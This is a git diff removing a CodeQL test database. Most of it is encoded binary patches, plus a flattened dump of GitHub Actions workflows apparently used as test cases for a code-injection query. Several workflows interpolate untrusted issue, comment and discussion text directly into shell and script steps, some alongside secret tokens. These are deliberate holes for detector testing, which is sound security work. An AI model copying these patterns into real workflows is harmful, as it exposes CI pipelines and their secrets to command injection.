zg80b9i3h&Axb~*RL!Z0_A8j6a2u@8CzwWw{x8P&VE8?`^%&mPZEXLR`-8F^ld+~!R z-p)Ga>`B98s+Z2XiK{lsGuqqEdWkP?uCvrxKk@LRJ?~61k9nB~zM(m`#EEK+oyq3f z(=sPYoKwun8MY|--!yUZ52sExGgr+Qdz5|L(wsfP7KLw}IQ0OZB(_cB*y|jYIJY;a z9~?hBCXOG*H71E3Ifm=b?woDTIm8F5v(Y)%TyqtM zD(234iL++7{B?e4&RXN{P+Xl06Q}kW*WPq4G7taGQD?3>`5_*Zc`q?%t@uabmz#5* z@qyz1io|&j!nv2OGLQX2$=lV5>-lot$i4_`G(0ZBC5LjcU!EI}*nSe7xA5iHH4a zVs|A@p0S7DZ60w3|BX3&NDF?y_pW@BnxauZPbW_OF!nXEXU*laFjQ;rJfArA1J`q%Kbo^9e4y0Ni-{9I zoPGS0dBg&zZeKEw_=CS}PQ9^SRAZgLnp5B803{EvnNvH=fwJB=5@)^e;gUBK5Bm{f zZ<&XG?BQ>lQ^&-EvcK<{D_12RlsMl{93Su{#6C3dThE`EN6t{i(D^iRe89(xeU>;m zV{cR|oqr|Hx`KaUPM^G?#QA07#0l5FETT1b=IcB6HTJ0Tya;QaukTt**;}-~xaR6| Z=7sl)vp4hg{VQtt3C`Sba!D)v{{YT;I}ZQ= diff --git a/db/db-yaml/default/locations_default.rel.checksum b/db/db-yaml/default/locations_default.rel.checksum deleted file mode 100644 index 03a4aef720e484065375574c17a9a760156d9e3a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf+ISNGXVrd0gM0u diff --git a/db/db-yaml/default/pools/0/buckets/info b/db/db-yaml/default/pools/0/buckets/info deleted file mode 100644 index cd70331e4c890dbea42420922676a5295c6ac512..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 dcmZQz00Tw{#Q>$*|AY9`S3Yh7(c(-BQUES?1O)&9 
diff --git a/db/db-yaml/default/pools/0/buckets/page-000000 b/db/db-yaml/default/pools/0/buckets/page-000000 deleted file mode 100644 index 8cbf6df672d50f404488bb5fc1472b6e689524e5..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmcJN1CVCR5`<@M+qP}nwr$(qyS8!H-fP>oZQIuSdM10fw(t38_Qi|W5%p(QW>$5d ziMc0PT->R+=+iKHw4Ri@BgR~R?y_gC>FZg;@F^za<;Egez`oQg)GTQZ(gZUv2EC6q zf_yITT`vk}f_ubYQ0992VSHQ0U|&)5y~j1Tha_ zyt3wgOj7w?!xOA;rm=KNKM|{ zlFST~J7oA^9~Pb>pN^_&GA|kKV$GEe|9_o+`86~-HcJ{GJa|3i3fY7%dF zUD_mie#s1oMjP(4cZ+0nS?VR~I6DV|87OxSYVM@&+CbkT;@+}> zR+!v7nw=VWZf{j;8h(uk&-qd3WyHD4k27;4&_B{$_0V_HXIKA^7FAOJqfl}rbTsPL zAb*s;a-jKm3r_<4MEyg7?%Hh9lJV|w!QKPr8}E~MweorCyHLNW?adwt}PCkAKo=JtuqwAJ5c2{XS( z1*bHkg?BbKIpb|?{EG!ZW= zUQVhy)siYexwC`X!X3q_54rnI`e*fqeEPdA61w~y?&tq>?&jWag72?t?*4DD9l$^V z<|~3tw0Ago5UrE;jusXp^I&kdzwb4XPXoWCW*bTGPd|_vDcy~gFx>T})n_ofDx)`a zCg+g^i2vPa_)L@c@&}N)5qh2APM1Ftp|v#H>wc+lj4-qCJ#)|RK{l!_hqztFizblV z+-c-X=xe&GN)p-J^4>$tO5UA%!h|m2_gUK*o)7*N`Jxds zCKgZMRc4Efr-HyA>YJJG2qG8SMHkrrMtViu^;YmL#npE=`Zmp#*Yyj*4b(T(YUNgt zdD6_RG+bksKuWq3Qm!YvL3bP$<`o_!a|^XD#=a`(X_R&AesVv->56|YV*Z%sN-4j@ z>~T^i_2YwmFVKI&zP|$fYP1KaSE$*>D{XjEv;IY~%QVyE``@V!Cr^`Bzs&VMrz&(GH|nQ=~}@4&lP`T*F`WSl&QnoK=M zEtdDI$t=}(cQP8$3nzv7yHt(H)FL^OI!xunuWd5D49AWY zhunJR+EC9>ov9Ck4AQ^OIir*zzl>T)y+N&K=hhhayRlh#wG;9E>OGf{@!2SB$6MA= z?hF;CfftEaF8-{S=ahNytrxAh&*4wW|IA^GH+99j1OG4TPI#9fR~)TwpdnpyrUiai z-FrzWqWPBGUZXG6p4-rKpg#eAWqe0(((XoN*O+@JN%!$ekfv&~81H>}X4Cupcy^7T z&LYeK4^i&qh{z^5|NhOR>|)LKA(C3$rEfL6RvP`^n=UHfi*8}IC$%q;xjkn8Y;s+g z9U76JZF2sm1>|a(Y-aJ*;2A>6B4*rdb@Zj+3TkhR3|9Qvl!Whd7Ed#CAeh@}-kDZj z^B`k)c>eZfWJZ!1!2TXVw!M}tm%iUGy$t-5%tOIGH`X*li(2=ca`|OG9?Z?)y?LlI z=I`R7WulfvXv-tCQ0f-k>HWq=zuEBB1j_o5u&3!un5>cGQlf9?J9-A+Vl$3+!(XKx z!;INXe5^dzHceue%k(BQhRSB<+L^f@&~G4D(}geNx75s~hZj&^ z3QURrM#Qr8=A99CTouF-%x5Gw-vrVIbEEKflWS`-j(#2VzD-Vct#%wkJVhU#T;`5# zfjQ0e&6q7`vd#e^A8wx7l1FUAerww;>F#h?7-3_Eo zkMR78?vOmb0UtNq(}JEv;90Z#o(O-w@vVJ@(ci)-&);B>v>x;)#0!C?_4nB%Ej4{1 
zX@2Juo+N_fnOUH@H71uAJ}lU0?6_a#rINTAoXA^lFf)&#_0#+8tm6#=VIKWaX}5zP N8$Z8x_A{EJ{{h2qJBR=P diff --git a/db/db-yaml/default/pools/0/info b/db/db-yaml/default/pools/0/info deleted file mode 100644 index 973b70fb15116e4f998ef8f5b6a62593c9526151..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 33 ZcmZQz00U-51_q`z5H!_m_hto?vCp~^jBYpLjWBQ1Y!UH 
diff --git a/db/db-yaml/default/pools/0/metadata/page-000000 b/db/db-yaml/default/pools/0/metadata/page-000000 deleted file mode 100644 index 60d89d0166f9fc32e6b58c35f33c5268e1a4119d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16384 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 diff --git a/db/db-yaml/default/pools/0/pageDump/page-000000000 b/db/db-yaml/default/pools/0/pageDump/page-000000000 deleted file mode 100644 index e8abb81542c7..000000000000 --- a/db/db-yaml/default/pools/0/pageDump/page-000000000 +++ /dev/null 
@@ -1,55 +0,0 @@ -/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/Users/pwntester/src/github.com/githubsecuritylab/Users/pwntester/src/github.com/Users/pwntester/src/Users/pwntester/Users/nametag:yaml.org,2002:strIssue Workflowontag:yaml.org,2002:boolissuestypesopenededitedtag:yaml.org,2002:seq[opened, edited]tag:yaml.org,2002:maptypes: ... edited]issues:jobsredirectIssueruns-onubuntu-latestCheck for issue transferCheck f ... ransferenvcontent_analysis_responsecontent ... esponseundefinedcontent ... definedstepsusesactions/checkout@v2uses: a ... kout@v2Remove conflicting charsRemove ... g charsISSUE_TITLE${{github.event.issue.title}}${{gith ... title}}ISSUE_T ... title}}frabert/replace-string-action@1.2frabert ... ion@1.2idremove_quotationswithpattern""\""string${{env.ISSUE_TITLE}}replace-with-"-"pattern: "\""name: R ... g charsCheck infocheck-inforunecho "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV -|name: Check info- uses: ... kout@v2runs-on ... 
-latestredirectIssue:name: Issue Workflow/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.ymlCIpull_requestbranchesmain- mainbranches:pull_request:changed_filesTest changed-filesactions/checkout@v4fetch-depth0tag:yaml.org,2002:intfetch-depth: 0uses: a ... kout@v4Get changed fileschanged-filestj-actions/changed-files@v40tj-acti ... les@v40name: G ... d filesList all changed filesList al ... d filesfor file in ${{ steps.changed-files.outputs.all_changed_files }}; do - echo "$file was changed" -done -name: L ... d files- uses: ... kout@v4changed_files:name: CI/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.ymlissue_commentecho-chamberecho '${{ github.event.comment.body }}' -run: |- run: |echo-chamber2echo '${{ github.event.comment.body }}'echo '$ ... ody }}'run: ec ... ody }}'echo '${{ github.event.issue.body }}'echo '${{ github.event.issue.title }}'echo '$ ... tle }}'run: ec ... tle }}'- run: ... ody }}'echo-chamber3actions/github-script@v3actions ... ript@v3scriptconsole.log('${{ github.event.comment.body }}')console ... dy }}')script: ... dy }}')uses: a ... ript@v3console.log('${{ github.event.issue.body }}')console.log('${{ github.event.issue.title }}')console ... le }}')script: ... le }}')- uses: ... ript@v3echo-chamber:on: issue_comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml[opened,edited]permissions{}ISSUE_BODY${{github.event.issue.body}}${{gith ... .body}}outputsresult${{env.content_analysis_response}}${{env. ... ponse}}result: ... ponse}}Check Issue Titleactions-ecosystem/action-regex-match@v2actions ... 
atch@v2regex-matchtextregex^[A-Za-z0-9 _.]*$'^[A-Za-z0-9 _.]*$'flagsgtext: $ ... title}}name: C ... e TitleExit Jobif${{ steps.regex-match.outputs.match == '' }}${{ ste ... = '' }}echo "Bad Issue Title Format" -exit 1 -name: Exit Jobfrabert/replace-string-action@v2.5frabert ... on@v2.5'-'Check InformationISSUE_TITLE_PARSED${{steps.remove_quotations.outputs.replaced}}${{step ... laced}}ISSUE_T ... laced}}echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV -name: C ... rmationLabel issueenv.content_analysis_response != 'Valid'env.con ... 'Valid'curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels -name: Label issuename: C ... ransfercheckIssueInformationcheckIs ... rmationneeds.redirectIssue.outputs.result == 'Valid'needs.r ... 'Valid'Check for missing informationCheck f ... rmationneedsanalysis_responsegreetings_commentThank you for submitting the issue to us. We are sorry to see you get stuck with your workflow. While waiting for our team member to respond, please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information."Thank ... orry tocomment_introHello ${{ github.actor }}, thank you for submitting this issue! We are super excited that you want to help us make Dynamo all that it can be."Hello ... issue! needs_more_info_commentneeds_m ... commentHowever, we need some more information in order for the Dynamo team to investigate any further.\n\n"Howeve ... Dynamoclose_issue_commentHowever, given that there has been no additional information added, this issue will be closed for now. Please reopen and provide additional information if you wish the Dynamo team to investigate further.\n\n"Howeve ... 
added, info_neededAdditional information:\n - Filling in of the provided Template (What did you do, What did you expect to see, What did you see instead, What packages or external references (if any) were used)\n - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\n - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\n - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase said errors message in the screenshot)\n - Reproducible steps on how to create the error in question."Additi ... ion:\\nspecific_infoCan you please fill in the following to the best of your ability:"Can yo ... ility:"templateISSUE_TEMPLATE.md"ISSUE_TEMPLATE.md"issue_labelneeds more infoacceptable_missing_infoaccepta ... ng_info1analysi ... definedISSUE_B ... .body}}${{env.ISSUE_BODY}}${{ steps.remove_quotations.outputs.replaced }}${{ ste ... aced }}ISSUE_B ... aced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV -Close issueenv.analysis_response == 'Empty'env.ana ... 'Empty'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} -name: Close issueLabel and comment issueLabel a ... t issue((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened'))((env.a ... 
ened'))curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments -name: L ... t issueUnlabel updated issueUnlabel ... d issueenv.analysis_response == 'Valid' && github.event.action == 'edited'env.ana ... edited'echo urldecode ${{env.issue_label}} -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') -name: U ... d issueGreetingsenv.analysis_response == 'Valid' && github.event.action == 'opened'env.ana ... opened'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments -name: Greetingsif: nee ... 'Valid'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.ymlIssue Type Predicterissue_type_Predicterparsed_issue_bodyissue_json_stringis_wish_listCheckout Dynamo Reponame: C ... mo RepoRemove Quotesremove_quotes${{ github.event.issue.body }}${{ git ... body }}ISSUE_B ... body }}${{ env.ISSUE_BODY }}${{ env ... BODY }}name: Remove QuotesAnalyze Issue Body${{ steps.remove_quotes.outputs.replaced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV -name: A ... ue BodyClean Issue Bodyenv.analysis_response == 'Valid'env.ana ... 'Valid'ISSUE_BODY_PARSEDecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV -name: C ... ue BodyCreate Issue JSON StringCreate ... StringISSUE_NUMBER${{ github.event.issue.number }}${{ git ... mber }}${{ github.event.issue.title }}${{ git ... 
itle }}ISSUE_N ... mber }}echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV -name: C ... StringCheckout IssuesTypePredicter RepoCheckou ... er ReporepositoryDynamoDS/IssuesTypePredicterDynamoD ... edicterpathIssuesTypePredicterreposit ... edictername: C ... er RepoSetup dotnetactions/setup-dotnet@v4actions ... tnet@v4dotnet-version3.1.0'3.1.0'dotnet- ... '3.1.0'name: Setup dotnetBuild Issues Type PredicterBuild I ... edicterdotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release -cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . -name: B ... edicterRun Issues Type PredicterRun Iss ... edicterecho "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV -name: R ... edicterLabel issue as 'Wishlist'Label i ... shlist'env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1')env.ana ... ist:1')GH_TOKEN${{ secrets.DYNAMO_ISSUES_TOKEN }}${{ sec ... OKEN }}GH_TOKE ... OKEN }}gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} -name: L ... shlist'Label issue as 'NotMLEvaluated'Label i ... luated'env.analysis_response != 'Valid' || env.issue_json_string == ''env.ana ... g == ''gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} -name: L ... luated'- name: ... mo Reponame: I ... edicterissue_t ... dicter:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.ymlCherry pickingpushmaster- masterpush:cherry_pickdestination_branchinvalid'invalid'auto_branchauto-${{github.event.after}}'auto-$ ... fter}}'user_nameDynamo-Bot"Dynamo-Bot"destina ... 
nvalid'checkoutactions/checkout@v3name: checkoutfrabert/replace-string-action@v1.2frabert ... on@v1.2${{github.event.commits[0].message}}${{gith ... ssage}}ISSUE_B ... laced}}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV -env.destination_branch != 'invalid'env.des ... nvalid'Create PR to branchgit config user.name "${{env.user_name}}" -git fetch --all -git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} -git cherry-pick -x ${{github.event.after}} --strategy-option theirs -git push -u origin ${{env.auto_branch}} -hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" -GITHUB_TOKEN${{secrets.DYNAMOBOTTOKEN}}${{secr ... TOKEN}}pr_messageCherry-Pick from commit: ${{github.event.after}} - -### Cherry-picking: -[Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) - -### Pull request: -${{ env.ISSUE_BODY_PARSED }} -GITHUB_ ... TOKEN}}if: env ... nvalid'- name: checkoutcherry_pick:name: Cherry picking/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.ymldiscussionecho '${{ github.event.discussion.title }}'echo '${{ github.event.discussion.body }}'- run: ... tle }}'on: discussion/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.ymldiscussion_commenton: dis ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.ymlgollumecho '${{ github.event.pages[1].title }}'echo '${{ github.event.pages[11].title }}'echo '${{ github.event.pages[0].page_name }}'echo '$ ... ame }}'run: ec ... ame }}'echo '${{ github.event.pages[2222].page_name }}'echo '${{ toJSON(github.event.pages.*.title) }}'echo '$ ... le) }}'run: ec ... 
# safeon: gollum/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.ymlImage URL Processingcreated[created]types: [created]issue_comment:process-image-urlcontains(github.event.comment.body, 'https://github.com/github/release-assets/assets/')contain ... sets/')Checkoutname: CheckoutExtract and Clean Initial URLExtract ... ial URLextract-urlBODY${{ github.event.comment.body }}BODY: $ ... body }}echo "::set-output name=initial_url::$BODY" -name: E ... ial URLGet Redirected URL with DebuggingGet Red ... buggingcurlINITIAL_URL${{ steps.extract-url.outputs.initial_url }}${{ ste ... _url }}INITIAL ... _url }}echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT -name: G ... buggingTrim URL after PNGtrim-urlREDIRECTED_URL${{ steps.curl.outputs.redirected_url }}REDIREC ... _url }}echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" -name: T ... ter PNGUpdate Comment with New URLUpdate ... New URLNEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" -name: U ... New URL- name: Checkoutprocess-image-url:name: I ... cessing/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.ymljob1job_output${{ steps.step.outputs.value }}${{ ste ... alue }}job_out ... alue }}sourceRemove foo from changed filesRemove ... d filesstepmad9000/actions-find-and-replace-string@3mad9000 ... tring@3${{ steps.source.outputs.all_changed_files }}${{ ste ... iles }}findfoo'foo'replace''source: ... iles }}name: R ... d filesjob2${{ always() }}sinkecho ${{needs.job1.outputs.job_output}}echo ${ ... utput}}id: sink- id: 